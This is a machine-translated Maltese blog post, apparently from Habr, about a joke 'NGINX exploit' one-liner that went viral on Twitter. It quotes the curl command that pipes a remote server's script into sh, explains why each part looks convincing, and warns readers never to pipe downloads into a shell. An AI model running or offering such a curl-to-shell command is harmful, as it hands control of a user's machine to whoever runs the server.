Nota. transl.:
TL; DR: Tużax file pipelining f'sh jew bash taħt l-ebda ċirkostanza. Dan huwa mod tajjeb ħafna biex titlef il-kontroll tal-kompjuter tiegħek.
Irrid naqsam magħkom storja qasira dwar exploit PoC komiku li nħoloq fil-31 ta' Mejju. Huwa deher fil-pront bi tweġiba għall-aħbarijiet minn
Wara li spiċċajt naħdem fuq teknika ġdida ta 'obfuscation fil-curl, ikkwotajt it-tweet oriġinali u "nixxejt PoC tax-xogħol" li jikkonsisti f'linja waħda ta' kodiċi li allegatament tisfrutta l-vulnerabbiltà skoperta. Naturalment, dan kien bla sens. Asssumi li se nkun espost immedjatament, u li fl-aħjar kont se nġib ftit retweets (oh well).
Madankollu, ma stajtx nimmaġina x’ġara wara. Il-popolarità tat-tweet tiegħi żdiedet. B'mod sorprendenti, bħalissa (15:00 ħin ta 'Moska 1 ta' Ġunju) ftit nies indunaw li dan huwa falz. Ħafna nies jirrettjawha mingħajr ma jiċċekkjawha (ħaseb u ara jammiraw il-grafika sabiħa ASCII li toħroġ).
Ħares kemm hu sabiħ!
Filwaqt li dawn il-linji u l-kuluri kollha huma kbar, huwa ċar li n-nies kellhom imexxu l-kodiċi fuq il-magna tagħhom biex jarawhom. Fortunatament, il-browsers jaħdmu bl-istess mod, u flimkien mal-fatt li ma ridtx verament nidħol f'inkwiet legali, il-kodiċi midfun fis-sit tiegħi kien biss jagħmel sejħiet ta 'eku mingħajr ma pprova jinstalla jew jesegwixxi xi kodiċi addizzjonali.
Digressjoni żgħira:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
L-inġinerija soċjo-elettronika (S.E.E.) hija aktar minn sempliċi phishing
Is-sigurtà u l-familjarità kienu parti kbira minn dan l-esperiment. Naħseb li huma dawk li wasslu għas-suċċess tiegħu. Il-linja tal-kmand kienet timplika b'mod ċar is-sigurtà billi tirreferi għal "127.0.0.1" (il-localhost magħruf). Localhost huwa meqjus sigur u d-data fuqha qatt ma tħalli l-kompjuter tiegħek.
Il-familjarità kienet it-tieni komponent ewlieni ta 'S.E.E. ta' l-esperiment. Peress li l-udjenza fil-mira kienet tikkonsisti primarjament minn nies familjari mal-baŜi tas-sigurtà tal-kompjuter, kien importanti li jinħoloq kodiċi sabiex partijiet minnu dehru familjari u familjari (u għalhekk sikuri). Is-self ta' elementi ta' kunċetti ta' sfruttament qodma u l-kombinazzjoni tagħhom b'mod mhux tas-soltu wera li kien ta' suċċess kbir.
Hawn taħt hawn analiżi dettaljata tal-one-liner. Kollox fuq din il-lista jilbes natura kożmetika, u prattikament xejn mhu meħtieġ għall-operat attwali tiegħu.
Liema komponenti huma verament meħtieġa? Dan -gsS
, -O 0x0238f06a
, |sh
u l-web server innifsu. Is-server tal-web ma kien fih l-ebda struzzjonijiet malizzjużi, iżda sempliċement serva grafika ASCII bl-użu ta 'kmandi echo
fl-iskrittura li tinsab fi index.html
. Meta l-utent daħal linja ma |sh
fin-nofs, index.html
mgħobbija u esegwita. Fortunatament, il-kustodji tas-server tal-web ma kellhom l-ebda intenzjoni ħażina.
-
../../../%00
— tirrappreżenta li tmur lil hinn mid-direttorju; -
ngx_stream_module.so
— mogħdija għal modulu NGINX każwali; -
/bin/sh%00<'protocol:TCP'
- suppost qed inniedu/bin/sh
fuq il-magna fil-mira u tidderieġi l-output lejn il-kanal TCP; -
-O 0x0238f06a#PLToffset
- ingredjent sigriet, supplimentat#PLToffset
, biex tidher qisha offset tal-memorja b'xi mod li jinsab fil-PLT; -
|sh;
- framment ieħor importanti. Kellna nidderieġu l-output għal sh/bash sabiex inwettqu l-kodiċi li ġej mis-server tal-web li jattakka li jinsab fi0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- manikin li fih jirreferi għal netcat/dev/tcp/localhost
sabiex kollox jidher sikur mill-ġdid. Fil-fatt, ma jagħmel xejn u huwa inkluż fil-linja għas-sbuħija.
Dan jikkonkludi d-dekodifikazzjoni tal-iskrittura b'linja waħda u d-diskussjoni ta 'aspetti ta' "inġinerija soċjo-elettronika" (phishing ikkomplikat).
Konfigurazzjoni Web Server u Kontromiżuri
Peress li l-maġġoranza l-kbira tal-abbonati tiegħi huma infosec/hackers, iddeċidejt li nagħmel is-server tal-web ftit aktar reżistenti għall-espressjonijiet ta '"interess" min-naħa tagħhom, biss sabiex il-guys ikollhom xi ħaġa x'jagħmlu (u jkun pjaċevoli li mwaqqfa). Mhux se nsemmi n-nases kollha hawn peress li l-esperiment għadu għaddej, iżda hawn ftit affarijiet li jagħmel is-server:
- Tissorvelja b'mod attiv it-tentattivi ta' distribuzzjoni fuq ċerti netwerks soċjali u tissostitwixxi diversi thumbnails ta' preview biex tħeġġeġ lill-utent biex ikklikkja fuq il-link.
- Tidderieġi mill-ġdid Chrome/Mozilla/Safari/eċċ għall-vidjo promozzjonali Thugcrowd minflok ma juri l-iskript tal-qoxra.
- Arloġġi għal sinjali OVVI ta 'intrużjoni/hacking sfaċċat, u mbagħad jibda tidderieġi talbiet għal servers NSA (ha!).
- Jinstalla Trojan, kif ukoll rootkit BIOS, fuq il-kompjuters kollha li l-utenti tagħhom iżuru l-host minn browser regolari (kidding!).
Parti żgħira ta 'antimeri
F'dan il-każ, l-uniku għan tiegħi kien li nikkontrolla xi wħud mill-karatteristiċi ta 'Apache - b'mod partikolari, ir-regoli friski għar-ridirezzjoni tar-rikjesti - u ħsibt: għaliex le?
NGINX Exploit (Reali!)
Abbona għal
Sors: www.habr.com